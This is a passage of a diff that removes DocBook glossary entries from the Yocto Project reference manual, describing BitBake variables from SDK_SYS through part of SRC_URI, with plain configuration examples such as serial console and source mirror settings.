-                    The OpenEmbedded build system automatically sets this
-                    variable based on
-                    <link linkend='var-SDK_ARCH'><filename>SDK_ARCH</filename></link>,
-                    <link linkend='var-SDK_VENDOR'><filename>SDK_VENDOR</filename></link>,
-                    and
-                    <link linkend='var-SDK_OS'><filename>SDK_OS</filename></link>.
-                    You do not need to set the <filename>SDK_SYS</filename>
-                    variable yourself.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SDK_TARGET_MANIFEST'><glossterm>SDK_TARGET_MANIFEST</glossterm>
-            <info>
-                SDK_TARGET_MANIFEST[doc] = "The manifest file for the target part of the SDK. This file lists all the installed packages that make up the target part of the SDK."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The manifest file for the target part of the SDK.
-                    This file lists all the installed packages that make up
-                    the target part of the SDK.
-                    The file contains package information on a line-per-package
-                    basis as follows:
-                    <literallayout class='monospaced'>
-     <replaceable>packagename</replaceable> <replaceable>packagearch</replaceable> <replaceable>version</replaceable>
-                    </literallayout>
-                </para>
-
-                <para>
-                    The
-                    <link linkend='ref-classes-populate-sdk-*'><filename>populate_sdk_base</filename></link>
-                    class defines the manifest file as follows:
-                    <literallayout class='monospaced'>
-     SDK_TARGET_MANIFEST = "${SDK_DEPLOY}/${TOOLCHAIN_OUTPUTNAME}.target.manifest"
-                    </literallayout>
-                    The location is derived using the
-                    <link linkend='var-SDK_DEPLOY'><filename>SDK_DEPLOY</filename></link>
-                    and
-                    <link linkend='var-TOOLCHAIN_OUTPUTNAME'><filename>TOOLCHAIN_OUTPUTNAME</filename></link>
-                    variables.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SDK_TARGETS'><glossterm>SDK_TARGETS</glossterm>
-            <info>
-                SDK_TARGETS[doc] = "A list of targets to install from shared state as part of the standard or extensible SDK installation."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A list of targets to install from shared state as part of
-                    the standard or extensible SDK installation.
-                    The default value is "${PN}" (i.e. the image from which
-                    the SDK is built).
-                </para>
-
-                <para>
-                    The <filename>SDK_TARGETS</filename> variable is an
-                    internal variable and typically would not be changed.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SDK_TITLE'><glossterm>SDK_TITLE</glossterm>
-            <info>
-                SDK_TITLE[doc] = "The title to be printed when running the SDK installer."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The title to be printed when running the SDK installer.
-                    By default, this title is based on the
-                    <link linkend='var-DISTRO_NAME'><filename>DISTRO_NAME</filename></link>
-                    or
-                    <link linkend='var-DISTRO'><filename>DISTRO</filename></link>
-                    variable and is set in the
-                    <link linkend='ref-classes-populate-sdk-*'><filename>populate_sdk_base</filename></link>
-                    class as follows:
-                    <literallayout class='monospaced'>
-     SDK_TITLE ??= "${@d.getVar('DISTRO_NAME') or d.getVar('DISTRO')} SDK"
-                    </literallayout>
-                    For the default distribution "poky",
-                    <filename>SDK_TITLE</filename> is set to
-                    "Poky (Yocto Project Reference Distro)".
-                </para>
-
-                <para>
-                    For information on how to change this default title,
-                    see the
-                    "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-changing-the-sdk-installer-title'>Changing the Extensible SDK Installer Title</ulink>"
-                    section in the Yocto Project Application Development and
-                    the Extensible Software Development Kit (eSDK) manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SDK_UPDATE_URL'><glossterm>SDK_UPDATE_URL</glossterm>
-            <info>
-                SDK_UPDATE_URL[doc] = "An optional URL for an update server for the extensible SDK."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    An optional URL for an update server for the extensible
-                    SDK.
-                    If set, the value is used as the default update server when
-                    running <filename>devtool sdk-update</filename> within the
-                    extensible SDK.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SDK_VENDOR'><glossterm>SDK_VENDOR</glossterm>
-            <info>
-                SDK_VENDOR[doc] = "Specifies the name of the SDK vendor."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the name of the SDK vendor.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SDK_VERSION'><glossterm>SDK_VERSION</glossterm>
-            <info>
-                SDK_VERSION[doc] = "Specifies the version for the SDK."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the version of the SDK.
-                    The distribution configuration file (e.g.
-                    <filename>/meta-poky/conf/distro/poky.conf</filename>)
-                    defines the <filename>SDK_VERSION</filename> as follows:
-                    <literallayout class='monospaced'>
-     SDK_VERSION = "${@d.getVar('DISTRO_VERSION').replace('snapshot-${DATE}','snapshot')}"
-                    </literallayout>
-                </para>
-
-                <para>
-                    For additional information, see the
-                    <link linkend='var-DISTRO_VERSION'><filename>DISTRO_VERSION</filename></link>
-                    and
-                    <link linkend='var-DATE'><filename>DATE</filename></link>
-                    variables.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SDKEXTPATH'><glossterm>SDKEXTPATH</glossterm>
-            <info>
-                SDKEXTPATH[doc] = "The default installation directory for the extensible SDK."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The default installation directory for the Extensible SDK.
-                    By default, this directory is based on the
-                    <link linkend='var-DISTRO'><filename>DISTRO</filename></link>
-                    variable and is set in the
-                    <link linkend='ref-classes-populate-sdk-*'><filename>populate_sdk_base</filename></link>
-                    class as follows:
-                    <literallayout class='monospaced'>
-     SDKEXTPATH ??= "~/${@d.getVar('DISTRO')}_sdk"
-                    </literallayout>
-                    For the default distribution "poky", the
-                    <filename>SDKEXTPATH</filename> is set to "poky_sdk".
-                </para>
-
-                <para>
-                    For information on how to change this default directory,
-                    see the
-                    "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-changing-the-default-sdk-installation-directory'>Changing the Default SDK Installation Directory</ulink>"
-                    section in the Yocto Project Application Development and
-                    the Extensible Software Development Kit (eSDK) manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SDKIMAGE_FEATURES'><glossterm>SDKIMAGE_FEATURES</glossterm>
-            <info>
-                SDKIMAGE_FEATURES[doc] = "Equivalent to IMAGE_FEATURES. However, this variable applies to the SDK generated from an image using the command 'bitbake -c populate_sdk imagename'."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Equivalent to
-                    <filename><link linkend='var-IMAGE_FEATURES'>IMAGE_FEATURES</link></filename>.
-                    However, this variable applies to the SDK generated from an
-                    image using the following command:
-                    <literallayout class='monospaced'>
-     $ bitbake -c populate_sdk <replaceable>imagename</replaceable>
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SDKMACHINE'><glossterm>SDKMACHINE</glossterm>
-            <info>
-                SDKMACHINE[doc] = "Specifies the architecture (i.e. i686 or x86_64) for which to build SDK items."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The machine for which the SDK is built.
-                    In other words, the SDK is built such that it
-                    runs on the target you specify with the
-                    <filename>SDKMACHINE</filename> value.
-                    The value points to a corresponding
-                    <filename>.conf</filename> file under
-                    <filename>conf/machine-sdk/</filename>.
-                </para>
-
-                <para>
-                     You can use "i686" and "x86_64" as possible values
-                     for this variable. The variable defaults to "i686"
-                     and is set in the local.conf file in the Build Directory.
-                     <literallayout class='monospaced'>
-     SDKMACHINE ?= "i686"
-                     </literallayout>
-                     <note>
-                         You cannot set the <filename>SDKMACHINE</filename>
-                         variable in your distribution configuration file.
-                         If you do, the configuration will not take affect.
-                     </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SDKPATH'><glossterm>SDKPATH</glossterm>
-            <info>
-                SDKPATH[doc] = "Defines the path offered to the user for installation of the SDK that is generated by the OpenEmbedded build system."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Defines the path offered to the user for installation
-                    of the SDK that is generated by the OpenEmbedded build
-                    system.
-                    The path appears as the default location for installing
-                    the SDK when you run the SDK's installation script.
-                    You can override the offered path when you run the
-                    script.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SDKTARGETSYSROOT'><glossterm>SDKTARGETSYSROOT</glossterm>
-            <info>
-                SDKTARGETSYSROOT[doc] = "Full path to the sysroot used for cross-compilation within an SDK as it will be when installed into the default SDKPATH."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The full path to the sysroot used for cross-compilation
-                    within an SDK as it will be when installed into the
-                    default
-                    <link linkend='var-SDKPATH'><filename>SDKPATH</filename></link>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SECTION'><glossterm>SECTION</glossterm>
-            <info>
-                SECTION[doc] = "The section in which packages should be categorized. Package management utilities can make use of this variable."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The section in which packages should be categorized.
-                    Package management utilities can make use of this variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SELECTED_OPTIMIZATION'><glossterm>SELECTED_OPTIMIZATION</glossterm>
-            <info>
-                SELECTED_OPTIMIZATION[doc] = "The variable takes the value of FULL_OPTIMIZATION unless DEBUG_BUILD = '1'. In this case, the value of DEBUG_OPTIMIZATION is used."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the optimization flags passed to the C compiler
-                    when building for the target.
-                    The flags are passed through the default value of the
-                    <link linkend='var-TARGET_CFLAGS'><filename>TARGET_CFLAGS</filename></link>
-                    variable.
-                </para>
-
-                <para>
-                    The <filename>SELECTED_OPTIMIZATION</filename> variable
-                    takes the value of
-                    <filename><link linkend='var-FULL_OPTIMIZATION'>FULL_OPTIMIZATION</link></filename>
-                    unless <filename><link linkend='var-DEBUG_BUILD'>DEBUG_BUILD</link></filename> = "1".
-                    If that is the case, the value of
-                    <filename><link linkend='var-DEBUG_OPTIMIZATION'>DEBUG_OPTIMIZATION</link></filename> is used.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SERIAL_CONSOLE'><glossterm>SERIAL_CONSOLE</glossterm>
-            <info>
-                SERIAL_CONSOLE[doc] = "Defines the serial consoles (TTYs) to enable using getty."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Defines a serial console (TTY) to enable using
-                    <ulink url='https://en.wikipedia.org/wiki/Getty_(Unix)'>getty</ulink>.
-                    Provide a value that specifies the baud rate followed by
-                    the TTY device name separated by a space.
-                    You cannot specify more than one TTY device:
-                    <literallayout class='monospaced'>
-     SERIAL_CONSOLE = "115200 ttyS0"
-                    </literallayout>
-                    <note>
-                        The <filename>SERIAL_CONSOLE</filename> variable
-                        is deprecated.
-                        Please use the
-                        <link linkend='var-SERIAL_CONSOLES'><filename>SERIAL_CONSOLES</filename></link>
-                        variable.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SERIAL_CONSOLES'><glossterm>SERIAL_CONSOLES</glossterm>
-            <info>
-                SERIAL_CONSOLES[doc] = "Defines the serial consoles (TTYs) to enable using getty."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Defines a serial console (TTY) to enable using
-                    <ulink url='https://en.wikipedia.org/wiki/Getty_(Unix)'>getty</ulink>.
-                    Provide a value that specifies the baud rate followed by
-                    the TTY device name separated by a semicolon.
-                    Use spaces to separate multiple devices:
-                    <literallayout class='monospaced'>
-     SERIAL_CONSOLES = "115200;ttyS0 115200;ttyS1"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SERIAL_CONSOLES_CHECK'><glossterm>SERIAL_CONSOLES_CHECK</glossterm>
-            <info>
-                SERIAL_CONSOLES_CHECK[doc] = "Selected SERIAL_CONSOLES to check against /proc/console before enabling using getty. Supported only by SysVinit."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies serial consoles, which must be listed in
-                    <link linkend='var-SERIAL_CONSOLES'><filename>SERIAL_CONSOLES</filename></link>,
-                    to check against <filename>/proc/console</filename>
-                    before enabling them using getty.
-                    This variable allows aliasing in the format:
-                    &lt;device&gt;:&lt;alias&gt;.
-                    If a device was listed as "sclp_line0"
-                    in <filename>/dev/</filename> and "ttyS0" was listed
-                    in <filename>/proc/console</filename>, you would do the
-                    following:
-                    <literallayout class='monospaced'>
-     SERIAL_CONSOLES_CHECK = "slcp_line0:ttyS0"
-                    </literallayout>
-                    This variable is currently only supported with SysVinit
-                    (i.e. not with systemd).
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SIGGEN_EXCLUDE_SAFE_RECIPE_DEPS'><glossterm>SIGGEN_EXCLUDE_SAFE_RECIPE_DEPS</glossterm>
-            <info>
-                SIGGEN_EXCLUDE_SAFE_RECIPE_DEPS[doc] = "A list of recipe dependencies that should not be used to determine signatures of tasks from one recipe when they depend on tasks from another recipe."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A list of recipe dependencies that should not be used to
-                    determine signatures of tasks from one recipe when they
-                    depend on tasks from another recipe.
-                    For example:
-                    <literallayout class='monospaced'>
-    SIGGEN_EXCLUDE_SAFE_RECIPE_DEPS += "intone->mplayer2"
-                    </literallayout>
-                </para>
-
-                <para>
-                    In the previous example, <filename>intone</filename>
-                    depends on <filename>mplayer2</filename>.
-                </para>
-
-                <para>
-                    You can use the special token <filename>"*"</filename> on
-                    the left-hand side of the dependency to match all
-                    recipes except the one on the right-hand side.
-                    Here is an example:
-                    <literallayout class='monospaced'>
-    SIGGEN_EXCLUDE_SAFE_RECIPE_DEPS += "*->quilt-native"
-                    </literallayout>
-                </para>
-
-                <para>
-                    In the previous example, all recipes except
-                    <filename>quilt-native</filename> ignore task
-                    signatures from the <filename>quilt-native</filename>
-                    recipe when determining their task signatures.
-                </para>
-
-                <para>
-                    Use of this variable is one mechanism to remove dependencies
-                    that affect task signatures and thus force rebuilds when a
-                    recipe changes.
-                    <note><title>Caution</title>
-                        If you add an inappropriate dependency for a recipe
-                        relationship, the software might break during
-                        runtime if the interface of the second recipe was
-                        changed after the first recipe had been built.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SIGGEN_EXCLUDERECIPES_ABISAFE'><glossterm>SIGGEN_EXCLUDERECIPES_ABISAFE</glossterm>
-            <info>
-                SIGGEN_EXCLUDERECIPES_ABISAFE[doc] = "A list of recipes that are completely stable and will never change."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A list of recipes that are completely stable and will
-                    never change.
-                    The ABI for the recipes in the list are presented by
-                    output from the tasks run to build the recipe.
-                    Use of this variable is one way to remove dependencies from
-                    one recipe on another that affect task signatures and
-                    thus force rebuilds when the recipe changes.
-                    <note><title>Caution</title>
-                        If you add an inappropriate variable to this list,
-                        the software might break at runtime if the
-                        interface of the recipe was changed after the other
-                        had been built.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SITEINFO_BITS'><glossterm>SITEINFO_BITS</glossterm>
-            <info>
-                SITEINFO_BITS[doc] = "Specifies the number of bits for the target system CPU."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the number of bits for the target system CPU.
-                    The value should be either "32" or "64".
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SITEINFO_ENDIANNESS'><glossterm>SITEINFO_ENDIANNESS</glossterm>
-            <info>
-                SITEINFO_ENDIANNESS[doc] = "Specifies the endian byte order of the target system. The value should be either 'le' for 'little-endian' or 'be' for 'big-endian'."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the endian byte order of the target system.
-                    The value should be either "le" for little-endian or "be" for big-endian.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SKIP_FILEDEPS'><glossterm>SKIP_FILEDEPS</glossterm>
-            <info>
-                SKIP_FILEDEPS[doc] = "Enables you to remove all files from the 'Provides' section of an RPM package."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Enables removal of all files from the "Provides" section of
-                    an RPM package.
-                    Removal of these files is required for packages containing
-                    prebuilt binaries and libraries such as
-                    <filename>libstdc++</filename> and
-                    <filename>glibc</filename>.
-                </para>
-
-                <para>
-                    To enable file removal, set the variable to "1" in your
-                    <filename>conf/local.conf</filename> configuration file
-                    in your:
-                    <link linkend='build-directory'>Build Directory</link>.
-                    <literallayout class='monospaced'>
-     SKIP_FILEDEPS = "1"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SOC_FAMILY'><glossterm>SOC_FAMILY</glossterm>
-            <info>
-                SOC_FAMILY[doc] = "Groups together machines based upon the same family of SOC (System On Chip). You typically set this variable in a common .inc file that you include in the configuration files of all the machines."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Groups together machines based upon the same family
-                    of SOC (System On Chip).
-                    You typically set this variable in a common
-                    <filename>.inc</filename> file that you include in the
-                    configuration files of all the machines.
-                    <note>
-                        You must include
-                        <filename>conf/machine/include/soc-family.inc</filename>
-                        for this variable to appear in
-                        <link linkend='var-MACHINEOVERRIDES'><filename>MACHINEOVERRIDES</filename></link>.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SOLIBS'><glossterm>SOLIBS</glossterm>
-            <info>
-                SOLIBS[doc] = "Defines the suffix for shared libraries used on the target platform."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Defines the suffix for shared libraries used on the
-                    target platform.
-                    By default, this suffix is ".so.*" for all Linux-based
-                    systems and is defined in the
-                    <filename>meta/conf/bitbake.conf</filename> configuration
-                    file.
-                </para>
-
-                <para>
-                    You will see this variable referenced in the default values
-                    of <filename>FILES_${PN}</filename>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SOLIBSDEV'><glossterm>SOLIBSDEV</glossterm>
-            <info>
-                SOLIBSDEV[doc] = "Defines the suffix for the development symbolic link (symlink) for shared libraries on the target platform."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Defines the suffix for the development symbolic link
-                    (symlink) for shared libraries on the target platform.
-                    By default, this suffix is ".so" for Linux-based
-                    systems and is defined in the
-                    <filename>meta/conf/bitbake.conf</filename> configuration
-                    file.
-                </para>
-
-                <para>
-                    You will see this variable referenced in the default values
-                    of <filename>FILES_${PN}-dev</filename>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SOURCE_MIRROR_FETCH'><glossterm>SOURCE_MIRROR_FETCH</glossterm>
-            <info>
-                SOURCE_MIRROR_FETCH[doc] = "Set as part of a source mirror generation script to skip COMPATIBLE_MACHINE and COMPATIBLE_HOST checks."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When you are fetching files to create a mirror of sources
-                    (i.e. creating a source mirror), setting
-                    <filename>SOURCE_MIRROR_FETCH</filename> to "1" in your
-                    <filename>local.conf</filename> configuration file ensures
-                    the source for all recipes are fetched regardless of
-                    whether or not a recipe is compatible with the
-                    configuration.
-                    A recipe is considered incompatible with the currently
-                    configured machine when either or both the
-                    <link linkend='var-COMPATIBLE_MACHINE'><filename>COMPATIBLE_MACHINE</filename></link>
-                    variable and
-                    <link linkend='var-COMPATIBLE_HOST'><filename>COMPATIBLE_HOST</filename></link>
-                    variables specify compatibility with a machine other
-                    than that of the current machine or host.
-                    <note><title>Warning</title>
-                        Do not set the
-                        <filename>SOURCE_MIRROR_FETCH</filename> variable
-                        unless you are creating a source mirror.
-                        In other words, do not set the variable during a
-                        normal build.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SOURCE_MIRROR_URL'><glossterm>SOURCE_MIRROR_URL</glossterm>
-            <info>
-                SOURCE_MIRROR_URL[doc] = "URL to source mirror that will be used before fetching from original SRC_URI."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Defines your own
-                    <link linkend='var-PREMIRRORS'><filename>PREMIRRORS</filename></link>
-                    from which to first fetch source before attempting to fetch
-                    from the upstream specified in
-                    <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>.
-                </para>
-
-                <para>
-                    To use this variable, you must globally inherit the
-                    <link linkend='ref-classes-own-mirrors'><filename>own-mirrors</filename></link>
-                    class and then provide the URL to your mirrors.
-                    Here is the general syntax:
-                    <literallayout class='monospaced'>
-     INHERIT += "own-mirrors"
-     SOURCE_MIRROR_URL = "http://<replaceable>example</replaceable>.com/<replaceable>my_source_mirror</replaceable>"
-                    </literallayout>
-                    <note>
-                        You can specify only a single URL in
-                        <filename>SOURCE_MIRROR_URL</filename>.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SPDXLICENSEMAP'><glossterm>SPDXLICENSEMAP</glossterm>
-            <info>
-                SPDXLICENSEMAP[doc] = "Maps commonly used license names to their SPDX counterparts found in meta/files/common-licenses/."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Maps commonly used license names to their SPDX counterparts
-                    found in <filename>meta/files/common-licenses/</filename>.
-                    For the default <filename>SPDXLICENSEMAP</filename>
-                    mappings, see the
-                    <filename>meta/conf/licenses.conf</filename> file.
-                </para>
-
-                <para>
-                    For additional information, see the
-                    <link linkend='var-LICENSE'><filename>LICENSE</filename></link>
-                    variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SPECIAL_PKGSUFFIX'><glossterm>SPECIAL_PKGSUFFIX</glossterm>
-            <info>
-                SPECIAL_PKGSUFFIX[doc] = "A list of prefixes for PN used by the OpenEmbedded build system to create variants of recipes or packages. The list specifies the prefixes to strip off during certain circumstances such as the generation of the BPN variable."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A list of prefixes for <link linkend='var-PN'><filename>PN</filename></link> used by the
-                    OpenEmbedded build system to create variants of recipes or packages.
-                    The list specifies the prefixes to strip off during certain circumstances
-                    such as the generation of the <link linkend='var-BPN'><filename>BPN</filename></link> variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SPL_BINARY'><glossterm>SPL_BINARY</glossterm>
-            <info>
-                SPL_BINARY[doc] = "The file type of the Secondary Program Loader (SPL)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The file type for the Secondary Program Loader (SPL).
-                    Some devices use an SPL from which to boot (e.g. the
-                    BeagleBone development board).
-                    For such cases, you can declare the file type of the
-                    SPL binary in the <filename>u-boot.inc</filename> include
-                    file, which is used in the U-Boot recipe.
-                </para>
-
-                <para>
-                    The SPL file type is set to "null" by default in the
-                    <filename>u-boot.inc</filename> file as follows:
-                    <literallayout class='monospaced'>
-     # Some versions of u-boot build an SPL (Second Program Loader) image that
-     # should be packaged along with the u-boot binary as well as placed in the
-     # deploy directory.  For those versions they can set the following variables
-     # to allow packaging the SPL.
-     SPL_BINARY ?= ""
-     SPL_BINARYNAME ?= "${@os.path.basename(d.getVar("SPL_BINARY"))}"
-     SPL_IMAGE ?= "${SPL_BINARYNAME}-${MACHINE}-${PV}-${PR}"
-     SPL_SYMLINK ?= "${SPL_BINARYNAME}-${MACHINE}"
-                    </literallayout>
-                    The <filename>SPL_BINARY</filename> variable helps form
-                    various <filename>SPL_*</filename> variables used by
-                    the OpenEmbedded build system.
-                </para>
-
-                <para>
-                    See the BeagleBone machine configuration example in the
-                    "<ulink url='&YOCTO_DOCS_BSP_URL;#creating-a-new-bsp-layer-using-the-bitbake-layers-script'>Creating a new BSP Layer Using the <filename>bitbake-layers</filename> Script</ulink>"
-                    section in the Yocto Project Board Support Package
-                    Developer's Guide for additional information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SRC_URI'><glossterm>SRC_URI</glossterm>
-            <info>
-                SRC_URI[doc] = "The list of source files - local or remote. This variable tells the OpenEmbedded build system what bits to pull in for the build and how to pull them in."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The list of source files - local or remote.
-                    This variable tells the OpenEmbedded build system which bits
-                    to pull in for the build and how to pull them in.
-                    For example, if the recipe or append file only needs to
-                    fetch a tarball from the Internet, the recipe or
-                    append file uses a single <filename>SRC_URI</filename>
-                    entry.
-                    On the other hand, if the recipe or append file needs to
-                    fetch a tarball, apply two patches, and include a custom
-                    file, the recipe or append file would include four
-                    instances of the variable.
-                </para>
-
-                <para>
-                    The following list explains the available URI protocols.
-                    URI protocols are highly dependent on particular BitBake
-                    Fetcher submodules.
-                    Depending on the fetcher BitBake uses, various URL
-                    parameters are employed.
-                    For specifics on the supported Fetchers, see the
-                    "<ulink url='&YOCTO_DOCS_BB_URL;#bb-fetchers'>Fetchers</ulink>"
-                    section in the BitBake User Manual.
-                    <itemizedlist>
-                        <listitem><para><emphasis><filename>file://</filename> -</emphasis>
-                            Fetches files, which are usually files shipped with
-                            the
-                            <link linkend='metadata'>Metadata</link>,
-                            from the local machine (e.g.
-                            <ulink url='&YOCTO_DOCS_OM_URL;#patching-dev-environment'>patch</ulink>
-                            files).
-                            The path is relative to the
-                            <link linkend='var-FILESPATH'><filename>FILESPATH</filename></link>
-                            variable.
-                            Thus, the build system searches, in order, from the
-                            following directories, which are assumed to be a
-                            subdirectories of the directory in which the
-                            recipe file (<filename>.bb</filename>) or
-                            append file (<filename>.bbappend</filename>)
-                            resides:
-                            <itemizedlist>
-                                <listitem><para><emphasis><filename>${BPN}</filename> -</emphasis>
-                                    The base recipe name without any special
-                                    suffix or version numbers.
-                                    </para></listitem>
-                                <listitem><para><emphasis><filename>${BP}</filename> -</emphasis>
-                                    <filename>${<link linkend='var-BPN'>BPN</link>}-${PV}</filename>.
-                                    The base recipe name and version but without
-                                    any special package name suffix.
-                                    </para></listitem>
-                                <listitem><para><emphasis>files -</emphasis>
-                                    Files within a directory, which is named
-                                    <filename>files</filename> and is also
-                                    alongside the recipe or append file.
-                                    </para></listitem>
-                            </itemizedlist>
-                            <note>
-                                If you want the build system to pick up files
-                                specified through a
-                                <filename>SRC_URI</filename>
-                                statement from your append file, you need to be
-                                sure to extend the
-                                <filename>FILESPATH</filename>
-                                variable by also using the
-                                <link linkend='var-FILESEXTRAPATHS'><filename>FILESEXTRAPATHS</filename></link>
-                                variable from within your append file.
-                            </note>
-                            </para></listitem>
-                        <listitem><para><emphasis><filename>bzr://</filename> -</emphasis> Fetches files from a
-                            Bazaar revision control repository.</para></listitem>
-                        <listitem><para><emphasis><filename>git://</filename> -</emphasis> Fetches files from a
-                            Git revision control repository.</para></listitem>
-                        <listitem><para><emphasis><filename>osc://</filename> -</emphasis> Fetches files from
-                            an OSC (OpenSUSE Build service) revision control repository.</para></listitem>
-                        <listitem><para><emphasis><filename>repo://</filename> -</emphasis> Fetches files from
-                            a repo (Git) repository.</para></listitem>
-                        <listitem><para><emphasis><filename>ccrc://</filename> -</emphasis>
-                            Fetches files from a ClearCase repository.
-                            </para></listitem>
-                        <listitem><para><emphasis><filename>http://</filename> -</emphasis> Fetches files from
-                            the Internet using <filename>http</filename>.</para></listitem>
-                        <listitem><para><emphasis><filename>https://</filename> -</emphasis> Fetches files
-                            from the Internet using <filename>https</filename>.</para></listitem>
-                        <listitem><para><emphasis><filename>ftp://</filename> -</emphasis> Fetches files
-                            from the Internet using <filename>ftp</filename>.</para></listitem>
-                        <listitem><para><emphasis><filename>cvs://</filename> -</emphasis> Fetches files from
-                            a CVS revision control repository.</para></listitem>
-                        <listitem><para><emphasis><filename>hg://</filename> -</emphasis> Fetches files from
-                            a Mercurial (<filename>hg</filename>) revision control repository.</para></listitem>
-                        <listitem><para><emphasis><filename>p4://</filename> -</emphasis> Fetches files from
-                            a Perforce (<filename>p4</filename>) revision control repository.</para></listitem>
-                        <listitem><para><emphasis><filename>ssh://</filename> -</emphasis> Fetches files from
-                            a secure shell.</para></listitem>
-                        <listitem><para><emphasis><filename>svn://</filename> -</emphasis> Fetches files from
-                            a Subversion (<filename>svn</filename>) revision control repository.</para></listitem>
-                        <listitem><para><emphasis><filename>npm://</filename> -</emphasis> Fetches JavaScript
-                            modules from a registry.
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-
-                <para>
-                    Standard and recipe-specific options for <filename>SRC_URI</filename> exist.
-                    Here are standard options:
-                    <itemizedlist>
-                        <listitem><para><emphasis><filename>apply</filename> -</emphasis> Whether to apply
-                            the patch or not.
-                            The default action is to apply the patch.</para></listitem>
-                        <listitem><para><emphasis><filename>striplevel</filename> -</emphasis> Which
-                            striplevel to use when applying the patch.
-                            The default level is 1.</para></listitem>
-                        <listitem><para><emphasis><filename>patchdir</filename> -</emphasis> Specifies
-                            the directory in which the patch should be applied.
-                            The default is <filename>${</filename><link linkend='var-S'><filename>S</filename></link><filename>}</filename>.
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-
-                <para>
-                    Here are options specific to recipes building code from a revision control system:
-                    <itemizedlist>
-                        <listitem><para><emphasis><filename>mindate</filename> -</emphasis>
-                            Apply the patch only if
-                            <link linkend='var-SRCDATE'><filename>SRCDATE</filename></link>
-                            is equal to or greater than <filename>mindate</filename>.
-                            </para></listitem>
-                        <listitem><para><emphasis><filename>maxdate</filename> -</emphasis>
-                            Apply the patch only if <filename>SRCDATE</filename>
-                            is not later than <filename>maxdate</filename>.
-                            </para></listitem>
-                        <listitem><para><emphasis><filename>minrev</filename> -</emphasis>
-                            Apply the patch only if <filename>SRCREV</filename>
-                            is equal to or greater than <filename>minrev</filename>.
-                            </para></listitem>
-                        <listitem><para><emphasis><filename>maxrev</filename> -</emphasis>
-                            Apply the patch only if <filename>SRCREV</filename>
-                            is not later than <filename>maxrev</filename>.
-                            </para></listitem>
-                        <listitem><para><emphasis><filename>rev</filename> -</emphasis>
